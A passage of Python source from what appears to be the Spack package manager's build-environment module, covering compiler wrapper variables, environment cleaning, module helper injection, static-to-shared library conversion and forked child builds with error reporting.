Skimming this module is a nice way to get acquainted with the types of
calls you can make from within the install() function.
"""
import inspect
import multiprocessing
import os
import shutil
import sys
import traceback
import types
from six import StringIO
import llnl.util.tty as tty
from llnl.util.tty.color import cescape, colorize
from llnl.util.filesystem import mkdirp, install, install_tree
from llnl.util.lang import dedupe
import spack.build_systems.cmake
import spack.build_systems.meson
import spack.config
import spack.main
import spack.paths
import spack.schema.environment
import spack.store
from spack.util.string import plural
from spack.util.environment import (
env_flag, filter_system_paths, get_path, is_system_path,
EnvironmentModifications, validate, preserve_environment)
from spack.util.environment import system_dirs
from spack.error import NoLibrariesError, NoHeadersError
from spack.util.executable import Executable
from spack.util.module_cmd import load_module, get_path_from_module
from spack.util.log_parse import parse_log_events, make_log_context
#
# This can be set by the user to globally disable parallel builds.
#
SPACK_NO_PARALLEL_MAKE = 'SPACK_NO_PARALLEL_MAKE'
#
# These environment variables are set by
# set_build_environment_variables and used to pass parameters to
# Spack's compiler wrappers.
#
SPACK_ENV_PATH = 'SPACK_ENV_PATH'
SPACK_INCLUDE_DIRS = 'SPACK_INCLUDE_DIRS'
SPACK_LINK_DIRS = 'SPACK_LINK_DIRS'
SPACK_RPATH_DIRS = 'SPACK_RPATH_DIRS'
SPACK_RPATH_DEPS = 'SPACK_RPATH_DEPS'
SPACK_LINK_DEPS = 'SPACK_LINK_DEPS'
SPACK_PREFIX = 'SPACK_PREFIX'
SPACK_INSTALL = 'SPACK_INSTALL'
SPACK_DEBUG = 'SPACK_DEBUG'
SPACK_SHORT_SPEC = 'SPACK_SHORT_SPEC'
SPACK_DEBUG_LOG_ID = 'SPACK_DEBUG_LOG_ID'
SPACK_DEBUG_LOG_DIR = 'SPACK_DEBUG_LOG_DIR'
SPACK_CCACHE_BINARY = 'SPACK_CCACHE_BINARY'
SPACK_SYSTEM_DIRS = 'SPACK_SYSTEM_DIRS'
# Platform-specific library suffix.
dso_suffix = 'dylib' if sys.platform == 'darwin' else 'so'
class MakeExecutable(Executable):
    """Special callable executable object for make so the user can specify
    parallelism options on a per-invocation basis.  Specifying
    'parallel' to the call will override whatever the package's
    global setting is, so you can either default to true or false and
    override particular calls.  Specifying 'jobs_env' to a particular
    call will name an environment variable which will be set to the
    parallelism level (without affecting the normal invocation with
    -j).

    Note that if the SPACK_NO_PARALLEL_MAKE env var is set it overrides
    everything.
    """

    def __init__(self, name, jobs):
        super(MakeExecutable, self).__init__(name)
        self.jobs = jobs

    def __call__(self, *args, **kwargs):
        """parallel, and jobs_env from kwargs are swallowed and used here;
        remaining arguments are passed through to the superclass.
        """
        disable = env_flag(SPACK_NO_PARALLEL_MAKE)
        # Pop 'parallel' unconditionally: the previous short-circuit
        # ("(not disable) and kwargs.pop(...)") skipped the pop whenever
        # SPACK_NO_PARALLEL_MAKE was set, leaking the 'parallel' keyword
        # through to Executable.__call__.
        parallel = kwargs.pop('parallel', self.jobs > 1) and not disable
        if parallel:
            args = ('-j{0}'.format(self.jobs),) + args
        jobs_env = kwargs.pop('jobs_env', None)
        if jobs_env:
            # Caller wants us to set an environment variable to
            # control the parallelism.
            kwargs['extra_env'] = {jobs_env: str(self.jobs)}
        return super(MakeExecutable, self).__call__(*args, **kwargs)
def clean_environment():
    """Sanitize the build environment of user settings that could
    interfere with the build.  Applied immediately (unlike the other
    setup functions) so later module loads are not overwritten.
    """
    env = EnvironmentModifications()

    # These variables can change how packages find libraries; unset
    # them so builds never pull in unintended external dependencies.
    for var_name in ('LD_LIBRARY_PATH', 'LIBRARY_PATH', 'CPATH',
                     'LD_RUN_PATH', 'DYLD_LIBRARY_PATH',
                     'DYLD_FALLBACK_LIBRARY_PATH'):
        env.unset(var_name)

    build_lang = spack.config.get('config:build_language')
    if build_lang:
        # Force compiler messages into a known language (e.g. English)
        # so parse_log_events can produce useful matches.
        env.set('LC_ALL', build_lang)

    # Strip macports directories from PATH: the macports ld conflicts
    # with the built-in linker on El Capitan and causes assembler
    # errors such as: suffix or operands invalid for `movq'"
    for entry in get_path('PATH'):
        if '/macports/' in entry:
            env.remove_path('PATH', entry)

    env.apply_modifications()
def set_compiler_environment_variables(pkg, env):
    """Add compiler-related variables for ``pkg`` to ``env``.

    Sets SPACK_CC/CXX/F77/FC (real compilers) and CC/CXX/F77/FC
    (wrapper paths), rpath/dtag/target arguments consumed by the
    compiler wrappers, and the per-flag SPACK_<FLAG> variables produced
    by the package's ``flag_handler``.

    Args:
        pkg (PackageBase): package being built; must have a concrete spec
        env (EnvironmentModifications): object the modifications are
            appended to

    Returns:
        The same ``env`` object, for chaining.
    """
    assert pkg.spec.concrete
    compiler = pkg.compiler
    spec = pkg.spec
    # Set compiler variables used by CMake and autotools
    assert all(key in compiler.link_paths for key in (
        'cc', 'cxx', 'f77', 'fc'))
    # Populate an object with the list of environment modifications
    # and return it
    # TODO : add additional kwargs for better diagnostics, like requestor,
    # ttyout, ttyerr, etc.
    link_dir = spack.paths.build_env_path
    # Set SPACK compiler variables so that our wrapper knows what to call.
    # A compiler component may be missing (e.g. no Fortran compiler), in
    # which case the corresponding variables are simply not set.
    if compiler.cc:
        env.set('SPACK_CC', compiler.cc)
        env.set('CC', os.path.join(link_dir, compiler.link_paths['cc']))
    if compiler.cxx:
        env.set('SPACK_CXX', compiler.cxx)
        env.set('CXX', os.path.join(link_dir, compiler.link_paths['cxx']))
    if compiler.f77:
        env.set('SPACK_F77', compiler.f77)
        env.set('F77', os.path.join(link_dir, compiler.link_paths['f77']))
    if compiler.fc:
        env.set('SPACK_FC', compiler.fc)
        env.set('FC', os.path.join(link_dir, compiler.link_paths['fc']))
    # Set SPACK compiler rpath flags so that our wrapper knows what to use
    env.set('SPACK_CC_RPATH_ARG', compiler.cc_rpath_arg)
    env.set('SPACK_CXX_RPATH_ARG', compiler.cxx_rpath_arg)
    env.set('SPACK_F77_RPATH_ARG', compiler.f77_rpath_arg)
    env.set('SPACK_FC_RPATH_ARG', compiler.fc_rpath_arg)
    env.set('SPACK_LINKER_ARG', compiler.linker_arg)
    # Check whether we want to force RPATH or RUNPATH
    if spack.config.get('config:shared_linking') == 'rpath':
        env.set('SPACK_DTAGS_TO_STRIP', compiler.enable_new_dtags)
        env.set('SPACK_DTAGS_TO_ADD', compiler.disable_new_dtags)
    else:
        env.set('SPACK_DTAGS_TO_STRIP', compiler.disable_new_dtags)
        env.set('SPACK_DTAGS_TO_ADD', compiler.enable_new_dtags)
    # Set the target parameters that the compiler will add
    isa_arg = spec.architecture.target.optimization_flags(compiler)
    env.set('SPACK_TARGET_ARGS', isa_arg)
    # Trap spack-tracked compiler flags as appropriate.
    # env_flags are easy to accidentally override.
    inject_flags = {}
    env_flags = {}
    build_system_flags = {}
    for flag in spack.spec.FlagMap.valid_compiler_flags():
        # Always convert flag_handler to function type.
        # This avoids discrepancies in calling conventions between functions
        # and methods, or between bound and unbound methods in python 2.
        # We cannot effectively convert everything to a bound method, which
        # would be the simpler solution.
        if isinstance(pkg.flag_handler, types.FunctionType):
            handler = pkg.flag_handler
        else:
            if sys.version_info >= (3, 0):
                handler = pkg.flag_handler.__func__
            else:
                handler = pkg.flag_handler.im_func
        # The handler splits each flag set three ways: injected via the
        # wrapper, exported via env vars, or passed to the build system.
        injf, envf, bsf = handler(pkg, flag, spec.compiler_flags[flag])
        inject_flags[flag] = injf or []
        env_flags[flag] = envf or []
        build_system_flags[flag] = bsf or []
    # Place compiler flags as specified by flag_handler
    for flag in spack.spec.FlagMap.valid_compiler_flags():
        # Concreteness guarantees key safety here
        if inject_flags[flag]:
            # variables SPACK_<FLAG> inject flags through wrapper
            var_name = 'SPACK_{0}'.format(flag.upper())
            env.set(var_name, ' '.join(f for f in inject_flags[flag]))
        if env_flags[flag]:
            # implicit variables
            env.set(flag.upper(), ' '.join(f for f in env_flags[flag]))
    pkg.flags_to_build_system_args(build_system_flags)
    env.set('SPACK_COMPILER_SPEC', str(spec.compiler))
    # NOTE(review): `system_dirs` is not defined in this function —
    # presumably a module-level import; confirm it is in scope here.
    env.set('SPACK_SYSTEM_DIRS', ':'.join(system_dirs))
    compiler.setup_custom_environment(pkg, env)
    return env
def set_build_environment_variables(pkg, env, dirty):
    """Ensure a clean install environment when we build packages.

    This involves unsetting pesky environment variables that may
    affect the build. It also involves setting environment variables
    used by Spack's compiler wrappers.

    Args:
        pkg: The package we are building
        env: The build environment
        dirty (bool): Skip unsetting the user's environment settings

    Returns:
        The same ``env`` object, for chaining.
    """
    # Gather information about various types of dependencies
    build_deps = set(pkg.spec.dependencies(deptype=('build', 'test')))
    link_deps = set(pkg.spec.traverse(root=False, deptype=('link')))
    build_link_deps = build_deps | link_deps
    rpath_deps = get_rpath_deps(pkg)
    link_dirs = []
    include_dirs = []
    rpath_dirs = []
    # The top-level package is always RPATHed. It hasn't been installed yet
    # so the RPATHs are added unconditionally (e.g. even though lib64/ may
    # not be created for the install).
    for libdir in ['lib', 'lib64']:
        lib_path = os.path.join(pkg.prefix, libdir)
        rpath_dirs.append(lib_path)
    # Set up link, include, RPATH directories that are passed to the
    # compiler wrapper
    for dep in link_deps:
        if is_system_path(dep.prefix):
            continue
        query = pkg.spec[dep.name]
        dep_link_dirs = list()
        try:
            dep_link_dirs.extend(query.libs.directories)
        except NoLibrariesError:
            tty.debug("No libraries found for {0}".format(dep.name))
        # Fall back to the conventional lib/ and lib64/ subdirectories
        # in addition to whatever the libs query reported.
        for default_lib_dir in ['lib', 'lib64']:
            default_lib_prefix = os.path.join(dep.prefix, default_lib_dir)
            if os.path.isdir(default_lib_prefix):
                dep_link_dirs.append(default_lib_prefix)
        link_dirs.extend(dep_link_dirs)
        if dep in rpath_deps:
            rpath_dirs.extend(dep_link_dirs)
        try:
            include_dirs.extend(query.headers.directories)
        except NoHeadersError:
            tty.debug("No headers found for {0}".format(dep.name))
    link_dirs = list(dedupe(filter_system_paths(link_dirs)))
    include_dirs = list(dedupe(filter_system_paths(include_dirs)))
    rpath_dirs = list(dedupe(filter_system_paths(rpath_dirs)))
    env.set(SPACK_LINK_DIRS, ':'.join(link_dirs))
    env.set(SPACK_INCLUDE_DIRS, ':'.join(include_dirs))
    env.set(SPACK_RPATH_DIRS, ':'.join(rpath_dirs))
    build_prefixes = [dep.prefix for dep in build_deps]
    build_link_prefixes = [dep.prefix for dep in build_link_deps]
    # add run-time dependencies of direct build-time dependencies:
    for build_dep in build_deps:
        for run_dep in build_dep.traverse(deptype='run'):
            build_prefixes.append(run_dep.prefix)
    # Filter out system paths: ['/', '/usr', '/usr/local']
    # These paths can be introduced into the build when an external package
    # is added as a dependency. The problem with these paths is that they often
    # contain hundreds of other packages installed in the same directory.
    # If these paths come first, they can overshadow Spack installations.
    build_prefixes = filter_system_paths(build_prefixes)
    build_link_prefixes = filter_system_paths(build_link_prefixes)
    # Add dependencies to CMAKE_PREFIX_PATH
    env.set_path('CMAKE_PREFIX_PATH', build_link_prefixes)
    # Set environment variables if specified for
    # the given compiler
    compiler = pkg.compiler
    env.extend(spack.schema.environment.parse(compiler.environment))
    if compiler.extra_rpaths:
        extra_rpaths = ':'.join(compiler.extra_rpaths)
        env.set('SPACK_COMPILER_EXTRA_RPATHS', extra_rpaths)
    implicit_rpaths = compiler.implicit_rpaths()
    if implicit_rpaths:
        env.set('SPACK_COMPILER_IMPLICIT_RPATHS', ':'.join(implicit_rpaths))
    # Add bin directories from dependencies to the PATH for the build.
    for prefix in build_prefixes:
        for dirname in ['bin', 'bin64']:
            bin_dir = os.path.join(prefix, dirname)
            if os.path.isdir(bin_dir):
                env.prepend_path('PATH', bin_dir)
    # Add spack build environment path with compiler wrappers first in
    # the path. We add the compiler wrapper path, which includes default
    # wrappers (cc, c++, f77, f90), AND a subdirectory containing
    # compiler-specific symlinks. The latter ensures that builds that
    # are sensitive to the *name* of the compiler see the right name when
    # we're building with the wrappers.
    #
    # Conflicts on case-insensitive systems (like "CC" and "cc") are
    # handled by putting one in the <build_env_path>/case-insensitive
    # directory. Add that to the path too.
    env_paths = []
    compiler_specific = os.path.join(
        spack.paths.build_env_path, pkg.compiler.name)
    for item in [spack.paths.build_env_path, compiler_specific]:
        env_paths.append(item)
        ci = os.path.join(item, 'case-insensitive')
        if os.path.isdir(ci):
            env_paths.append(ci)
    for item in env_paths:
        env.prepend_path('PATH', item)
    env.set_path(SPACK_ENV_PATH, env_paths)
    # Working directory for the spack command itself, for debug logs.
    if spack.config.get('config:debug'):
        env.set(SPACK_DEBUG, 'TRUE')
        env.set(SPACK_SHORT_SPEC, pkg.spec.short_spec)
        env.set(SPACK_DEBUG_LOG_ID, pkg.spec.format('{name}-{hash:7}'))
        env.set(SPACK_DEBUG_LOG_DIR, spack.main.spack_working_dir)
    # Find ccache binary and hand it to build environment
    if spack.config.get('config:ccache'):
        ccache = Executable('ccache')
        # NOTE(review): this relies on Executable being falsy when the
        # binary is not found on PATH — confirm against Executable's
        # truthiness semantics.
        if not ccache:
            raise RuntimeError("No ccache binary found in PATH")
        env.set(SPACK_CCACHE_BINARY, ccache)
    # Add any pkgconfig directories to PKG_CONFIG_PATH
    for prefix in build_link_prefixes:
        for directory in ('lib', 'lib64', 'share'):
            pcdir = os.path.join(prefix, directory, 'pkgconfig')
            if os.path.isdir(pcdir):
                env.prepend_path('PKG_CONFIG_PATH', pcdir)
    return env
def _set_variables_for_single_module(pkg, module):
    """Helper function to set module variables for single module.

    Injects build tools (make, cmake, ...), shell-like helpers
    (cd, mkdirp, ...) and compiler wrapper paths into ``module``'s
    global scope so package code can use them unqualified.  Idempotent:
    a marker attribute prevents re-execution for the same module.
    """
    # Put a marker on this module so that it won't execute the body of this
    # function again, since it is not needed
    marker = '_set_run_already_called'
    if getattr(module, marker, False):
        return
    # Serial build if the package disallows parallelism; otherwise the
    # configured job count, capped by the machine's CPU count.
    jobs = spack.config.get('config:build_jobs', 16) if pkg.parallel else 1
    jobs = min(jobs, multiprocessing.cpu_count())
    assert jobs is not None, "no default set for config:build_jobs"
    m = module
    m.make_jobs = jobs
    # TODO: make these build deps that can be installed if not found.
    m.make = MakeExecutable('make', jobs)
    m.gmake = MakeExecutable('gmake', jobs)
    m.scons = MakeExecutable('scons', jobs)
    m.ninja = MakeExecutable('ninja', jobs)
    # easy shortcut to os.environ
    m.env = os.environ
    # Find the configure script in the archive path
    # Don't use which for this; we want to find it in the current dir.
    m.configure = Executable('./configure')
    m.meson = Executable('meson')
    m.cmake = Executable('cmake')
    m.ctest = MakeExecutable('ctest', jobs)
    # Standard CMake arguments
    m.std_cmake_args = spack.build_systems.cmake.CMakePackage._std_args(pkg)
    m.std_meson_args = spack.build_systems.meson.MesonPackage._std_args(pkg)
    # Put spack compiler paths in module scope.
    link_dir = spack.paths.build_env_path
    m.spack_cc = os.path.join(link_dir, pkg.compiler.link_paths['cc'])
    m.spack_cxx = os.path.join(link_dir, pkg.compiler.link_paths['cxx'])
    m.spack_f77 = os.path.join(link_dir, pkg.compiler.link_paths['f77'])
    m.spack_fc = os.path.join(link_dir, pkg.compiler.link_paths['fc'])
    # Emulate some shell commands for convenience
    m.pwd = os.getcwd
    m.cd = os.chdir
    m.mkdir = os.mkdir
    m.makedirs = os.makedirs
    m.remove = os.remove
    m.removedirs = os.removedirs
    m.symlink = os.symlink
    m.mkdirp = mkdirp
    m.install = install
    m.install_tree = install_tree
    m.rmtree = shutil.rmtree
    m.move = shutil.move
    # Useful directories within the prefix are encapsulated in
    # a Prefix object.
    m.prefix = pkg.prefix
    # Platform-specific library suffix.
    m.dso_suffix = dso_suffix
    def static_to_shared_library(static_lib, shared_lib=None, **kwargs):
        # Closure over pkg: converts a static lib using the package's
        # architecture and (by default) the Spack cc wrapper.
        compiler_path = kwargs.get('compiler', m.spack_cc)
        compiler = Executable(compiler_path)
        return _static_to_shared_library(pkg.spec.architecture, compiler,
                                         static_lib, shared_lib, **kwargs)
    m.static_to_shared_library = static_to_shared_library
    # Put a marker on this module so that it won't execute the body of this
    # function again, since it is not needed
    setattr(m, marker, True)
def set_module_variables_for_package(pkg):
    """Populate the module scope of install() with some useful functions.

    This makes things easier for package writers.  Custom package repos
    may subclass packages from other repos (e.g.
    spack.pkg.mystuff.libelf.Libelf inheriting from
    spack.pkg.original.libelf.Libelf), so the variables are set on the
    module of every ancestor class as well — parent_class_modules
    includes pkg.module itself — letting parent classes use them too.
    """
    for ancestor_module in parent_class_modules(pkg.__class__):
        _set_variables_for_single_module(pkg, ancestor_module)
def _static_to_shared_library(arch, compiler, static_lib, shared_lib=None,
                              **kwargs):
    """
    Converts a static library to a shared library. The static library has to
    be built with PIC for the conversion to work.

    Parameters:
        static_lib (str): Path to the static library.
        shared_lib (str): Path to the shared library. Default is to derive
            from the static library's path.

    Keyword arguments:
        compiler (str): Path to the compiler. Default is spack_cc.
        compiler_output: Where to print compiler output to.
        arguments (str list): Additional arguments for the compiler.
        version (str): Library version. Default is unspecified.
        compat_version (str): Library compatibility version. Default is
            version.
    """
    compiler_output = kwargs.get('compiler_output', None)
    arguments = kwargs.get('arguments', [])
    version = kwargs.get('version', None)
    compat_version = kwargs.get('compat_version', version)
    if not shared_lib:
        # Derive e.g. libfoo.so / libfoo.dylib next to the static archive.
        shared_lib = '{0}.{1}'.format(os.path.splitext(static_lib)[0],
                                      dso_suffix)
    compiler_args = []
    # TODO: Compiler arguments should not be hardcoded but provided by
    # the different compiler classes.
    if 'linux' in arch:
        # GNU-style link: pull the whole archive in and stamp an soname.
        soname = os.path.basename(shared_lib)
        if compat_version:
            soname += '.{0}'.format(compat_version)
        compiler_args = [
            '-shared',
            '-Wl,-soname,{0}'.format(soname),
            '-Wl,--whole-archive',
            static_lib,
            '-Wl,--no-whole-archive'
        ]
    elif 'darwin' in arch:
        # macOS: dynamiclib with install_name and optional version info.
        install_name = shared_lib
        if compat_version:
            install_name += '.{0}'.format(compat_version)
        compiler_args = [
            '-dynamiclib',
            '-install_name', '{0}'.format(install_name),
            '-Wl,-force_load,{0}'.format(static_lib)
        ]
        if compat_version:
            compiler_args.extend(['-compatibility_version', '{0}'.format(
                compat_version)])
        if version:
            compiler_args.extend(['-current_version', '{0}'.format(version)])
    if len(arguments) > 0:
        compiler_args.extend(arguments)
    # The output name carries the most specific version suffix available.
    shared_lib_base = shared_lib
    if version:
        shared_lib += '.{0}'.format(version)
    elif compat_version:
        shared_lib += '.{0}'.format(compat_version)
    compiler_args.extend(['-o', shared_lib])
    # Create symlinks for version and compat_version
    # NOTE(review): the symlinks are created *before* the compiler call
    # below produces the library, so they dangle until the link
    # completes (and remain dangling if it fails) — confirm intended.
    shared_lib_link = os.path.basename(shared_lib)
    if version or compat_version:
        os.symlink(shared_lib_link, shared_lib_base)
    if compat_version and compat_version != version:
        os.symlink(shared_lib_link, '{0}.{1}'.format(shared_lib_base,
                                                     compat_version))
    return compiler(*compiler_args, output=compiler_output)
def get_rpath_deps(pkg):
    """Return immediate or transitive RPATHs depending on the package.

    Args:
        pkg (PackageBase): package under consideration

    Returns:
        list: link-type dependency specs — all transitive ones when
        ``pkg.transitive_rpaths`` is true, otherwise only the direct
        dependencies.
    """
    if pkg.transitive_rpaths:
        # list(...) instead of a copying comprehension (same result).
        return list(pkg.spec.traverse(root=False, deptype=('link')))
    else:
        return pkg.spec.dependencies(deptype='link')
def get_rpaths(pkg):
    """Get a list of all the rpaths for a package."""
    # The package's own lib/lib64 prefixes always come first.
    rpaths = [pkg.prefix.lib, pkg.prefix.lib64]
    deps = get_rpath_deps(pkg)
    # Then every existing dependency lib dir, then every lib64 dir.
    for subdir in ('lib', 'lib64'):
        for dep in deps:
            candidate = getattr(dep.prefix, subdir)
            if os.path.isdir(candidate):
                rpaths.append(candidate)
    # Second module is our compiler mod name. We use that to get rpaths from
    # module show output.
    if pkg.compiler.modules and len(pkg.compiler.modules) > 1:
        rpaths.append(get_path_from_module(pkg.compiler.modules[1]))
    return rpaths
def get_std_cmake_args(pkg):
    """List of standard arguments used if a package is a CMakePackage.

    Args:
        pkg (PackageBase): package under consideration

    Returns:
        list of str: standard arguments that would be used if this
        package were a CMakePackage instance.
    """
    return spack.build_systems.cmake.CMakePackage._std_args(pkg)
def get_std_meson_args(pkg):
    """List of standard arguments used if a package is a MesonPackage.

    Args:
        pkg (PackageBase): package under consideration

    Returns:
        list of str: standard arguments that would be used if this
        package were a MesonPackage instance.
    """
    return spack.build_systems.meson.MesonPackage._std_args(pkg)
def parent_class_modules(cls):
    """
    Get list of superclass modules that descend from spack.package.PackageBase

    Includes cls.__module__ first, followed (depth-first) by the modules
    of its base classes.  Returns an empty list unless ``cls`` is a
    *proper* subclass of PackageBase.
    """
    is_proper_subclass = (issubclass(cls, spack.package.PackageBase) and
                          not issubclass(spack.package.PackageBase, cls))
    if not is_proper_subclass:
        return []
    modules = []
    own_module = sys.modules.get(cls.__module__)
    if own_module:
        modules.append(own_module)
    for base in cls.__bases__:
        modules.extend(parent_class_modules(base))
    return modules
def load_external_modules(pkg):
    """Traverse a package's spec DAG and load any external modules.

    Traverse a package's dependencies and load any external modules
    associated with them.

    Args:
        pkg (PackageBase): package to load deps for
    """
    # Iterate the traversal directly; materializing it into a list
    # first (as before) was an unnecessary copy.
    for dep in pkg.spec.traverse():
        if dep.external_module:
            load_module(dep.external_module)
def setup_package(pkg, dirty):
    """Execute all environment setup routines.

    Args:
        pkg (PackageBase): package being built
        dirty (bool): if True, skip cleaning/sanitizing the user's
            environment before applying build modifications
    """
    build_env = EnvironmentModifications()
    if not dirty:
        clean_environment()
    # Accumulate modifications: compiler vars, build vars, platform
    # hooks, then dependency-provided modifications, in that order.
    set_compiler_environment_variables(pkg, build_env)
    set_build_environment_variables(pkg, build_env, dirty)
    pkg.architecture.platform.setup_platform_environment(pkg, build_env)
    build_env.extend(
        modifications_from_dependencies(pkg.spec, context='build')
    )
    # Warn when a dependency re-populated CPATH after clean_environment
    # unset it: pkg-config may then drop system-looking include flags.
    if (not dirty) and (not build_env.is_unset('CPATH')):
        tty.debug("A dependency has updated CPATH, this may lead pkg-config"
                  " to assume that the package is part of the system"
                  " includes and omit it when invoked with '--cflags'.")
    set_module_variables_for_package(pkg)
    pkg.setup_build_environment(build_env)
    # Loading modules, in particular if they are meant to be used outside
    # of Spack, can change environment variables that are relevant to the
    # build of packages. To avoid a polluted environment, preserve the
    # value of a few, selected, environment variables
    # With the current ordering of environment modifications, this is strictly
    # unnecessary. Modules affecting these variables will be overwritten anyway
    with preserve_environment('CC', 'CXX', 'FC', 'F77'):
        # All module loads that otherwise would belong in previous
        # functions have to occur after the build_env object has its
        # modifications applied. Otherwise the environment modifications
        # could undo module changes, such as unsetting LD_LIBRARY_PATH
        # after a module changes it.
        for mod in pkg.compiler.modules:
            # Fixes issue https://github.com/spack/spack/issues/3153
            if os.environ.get("CRAY_CPU_TARGET") == "mic-knl":
                load_module("cce")
            load_module(mod)
        if pkg.architecture.target.module_name:
            load_module(pkg.architecture.target.module_name)
        load_external_modules(pkg)
    # Make sure nothing's strange about the Spack environment.
    validate(build_env, tty.warn)
    build_env.apply_modifications()
def modifications_from_dependencies(spec, context):
    """Returns the environment modifications that are required by
    the dependencies of a spec and also applies modifications
    to this spec's package at module scope, if need be.

    Args:
        spec (Spec): spec for which we want the modifications
        context (str): either 'build' for build-time modifications or 'run'
            for run-time modifications

    Returns:
        EnvironmentModifications: accumulated modifications from all
        dependencies (post-order traversal, root excluded).
    """
    env = EnvironmentModifications()
    pkg = spec.package
    # Maps the context to deptype and method to be called
    deptype_and_method = {
        'build': (('build', 'link', 'test'),
                  'setup_dependent_build_environment'),
        'run': (('link', 'run'), 'setup_dependent_run_environment')
    }
    deptype, method = deptype_and_method[context]
    for dspec in spec.traverse(order='post', root=False, deptype=deptype):
        dpkg = dspec.package
        set_module_variables_for_package(dpkg)
        # Allow dependencies to modify the module
        dpkg.setup_dependent_package(pkg.module, spec)
        # Dispatch to the context-appropriate hook on the dependency.
        getattr(dpkg, method)(env, spec)
    return env
def fork(pkg, function, dirty, fake):
    """Fork a child process to do part of a spack build.

    Args:
        pkg (PackageBase): package whose environment we should set up the
            forked process for.
        function (callable): argless function to run in the child
            process.
        dirty (bool): If True, do NOT clean the environment before
            building.
        fake (bool): If True, skip package setup b/c it's not a real build

    Usage::

        def child_fun():
            # do stuff
        build_env.fork(pkg, child_fun)

    Forked processes are run with the build environment set up by
    spack.build_environment. This allows package authors to have full
    control over the environment, etc. without affecting other builds
    that might be executed in the same spack call.

    If something goes wrong, the child process catches the error and
    passes it to the parent wrapped in a ChildError. The parent is
    expected to handle (or re-raise) the ChildError.
    """
    def child_process(child_pipe, input_stream):
        # We are in the child process. Python sets sys.stdin to
        # open(os.devnull) to prevent our process and its parent from
        # simultaneously reading from the original stdin. But, we assume
        # that the parent process is not going to read from it till we
        # are done with the child, so we undo Python's precaution.
        if input_stream is not None:
            sys.stdin = input_stream
        try:
            if not fake:
                setup_package(pkg, dirty=dirty)
            return_value = function()
            child_pipe.send(return_value)
        except StopIteration as e:
            # StopIteration is used to stop installations
            # before the final stage, mainly for debug purposes
            tty.msg(e)
            child_pipe.send(None)
        except BaseException:
            # catch ANYTHING that goes wrong in the child process
            exc_type, exc, tb = sys.exc_info()
            # Need to unwind the traceback in the child because traceback
            # objects can't be sent to the parent.
            tb_string = traceback.format_exc()
            # build up some context from the offending package so we can
            # show that, too.
            package_context = get_package_context(tb)
            build_log = None
            if hasattr(pkg, 'log_path'):
                build_log = pkg.log_path
            # make a pickleable exception to send to parent.
            msg = "%s: %s" % (exc_type.__name__, str(exc))
            ce = ChildError(msg,
                            exc_type.__module__,
                            exc_type.__name__,
                            tb_string, build_log, package_context)
            child_pipe.send(ce)
        finally:
            # Always close our end so the parent's recv() cannot hang.
            child_pipe.close()
    parent_pipe, child_pipe = multiprocessing.Pipe()
    input_stream = None
    try:
        # Forward sys.stdin when appropriate, to allow toggling verbosity
        if sys.stdin.isatty() and hasattr(sys.stdin, 'fileno'):
            input_stream = os.fdopen(os.dup(sys.stdin.fileno()))
        p = multiprocessing.Process(
            target=child_process, args=(child_pipe, input_stream))
        p.start()
    except InstallError as e:
        e.pkg = pkg
        raise
    finally:
        # Close the input stream in the parent process
        if input_stream is not None:
            input_stream.close()
    # Block until the child sends a result (or a pickled ChildError).
    child_result = parent_pipe.recv()
    p.join()
    # let the caller know which package went wrong.
    if isinstance(child_result, InstallError):
        child_result.pkg = pkg
    # If the child process raised an error, print its output here rather
    # than waiting until the call to SpackError.die() in main(). This
    # allows exception handling output to be logged from within Spack.
    # see spack.main.SpackCommand.
    if isinstance(child_result, ChildError):
        child_result.print_context()
        raise child_result
    return child_result
def get_package_context(traceback, context=3):
    """Return some context for an error message when the build fails.

    Args:
        traceback (traceback): A traceback from some exception raised during
            install
        context (int): Lines of context to show before and after the line
            where the error happened

    This function inspects the stack to find where we failed in the
    package file, and it adds detailed context to the long_message
    from there.

    Returns:
        list of str: a location header line followed by marked-up source
        lines around the failing statement.
    """
    def make_stack(tb, stack=None):
        """Tracebacks come out of the system in caller -> callee order. Return
        an array in callee -> caller order so we can traverse it."""
        if stack is None:
            stack = []
        if tb is not None:
            make_stack(tb.tb_next, stack)
            stack.append(tb)
        return stack
    stack = make_stack(traceback)
    # Walk from the deepest frame outward looking for a PackageBase
    # method frame.  NOTE(review): if no frame matches, `frame` is left
    # bound to the last one examined — confirm that fallback is intended.
    for tb in stack:
        frame = tb.tb_frame
        if 'self' in frame.f_locals:
            # Find the first proper subclass of PackageBase.
            obj = frame.f_locals['self']
            if isinstance(obj, spack.package.PackageBase):
                break
    # We found obj, the Package implementation we care about.
    # Point out the location in the install method where we failed.
    lines = [
        '{0}:{1:d}, in {2}:'.format(
            inspect.getfile(frame.f_code),
            # NOTE(review): CPython's f_lineno is 1-based, not 0-based as
            # the original comment claimed — confirm the -1 is intended.
            frame.f_lineno - 1,
            frame.f_code.co_name
        )
    ]
    # Build a message showing context in the install method.
    sourcelines, start = inspect.getsourcelines(frame)
    # Calculate lineno of the error relative to the start of the function.
    # NOTE(review): see the 1-based f_lineno note above for this -1 too.
    fun_lineno = frame.f_lineno - start - 1
    start_ctx = max(0, fun_lineno - context)
    sourcelines = sourcelines[start_ctx:fun_lineno + context + 1]
    for i, line in enumerate(sourcelines):
        is_error = start_ctx + i == fun_lineno
        mark = '>> ' if is_error else ' '
        # Add start to get lineno relative to start of file, not function.
        marked = ' {0}{1:-6d}{2}'.format(
            mark, start + start_ctx + i, line.rstrip())
        if is_error:
            # Highlight the failing line in red.
            marked = colorize('@R{%s}' % cescape(marked))
        lines.append(marked)
    return lines
class InstallError(spack.error.SpackError):
    """Raised by packages when a package fails to install.

    Any subclass of InstallError will be annotated by Spack with a
    ``pkg`` attribute on failure, which the caller can use to get the
    package for which the exception was raised.
    """
class ChildError(InstallError):
    """Special exception class for wrapping exceptions from child processes
    in Spack's build environment.

    The main features of a ChildError are:

    1. They're serializable, so when a child build fails, we can send one
       of these to the parent and let the parent report what happened.

    2. They have a ``traceback`` field containing a traceback generated
       on the child immediately after failure. Spack will print this on
       failure in lieu of trying to run sys.excepthook on the parent
       process, so users will see the correct stack trace from a child.

    3. They also contain context, which shows context in the Package
       implementation where the error happened. This helps people debug
       Python code in their packages. To get it, Spack searches the
       stack trace for the deepest frame where ``self`` is in scope and
       is an instance of PackageBase. This will generally find a useful
       spot in the ``package.py`` file.

    The long_message of a ChildError displays one of two things:

    1. If the original error was a ProcessError, indicating a command
       died during the build, we'll show context from the build log.

    2. If the original error was any other type of error, we'll show
       context from the Python code.

    SpackError handles displaying the special traceback if we're in debug
    mode with spack -d.
    """
    # List of errors considered "build errors", for which we'll show log
    # context instead of Python context.
    build_errors = [('spack.util.executable', 'ProcessError')]
    def __init__(self, msg, module, classname, traceback_string, build_log,
                 context):
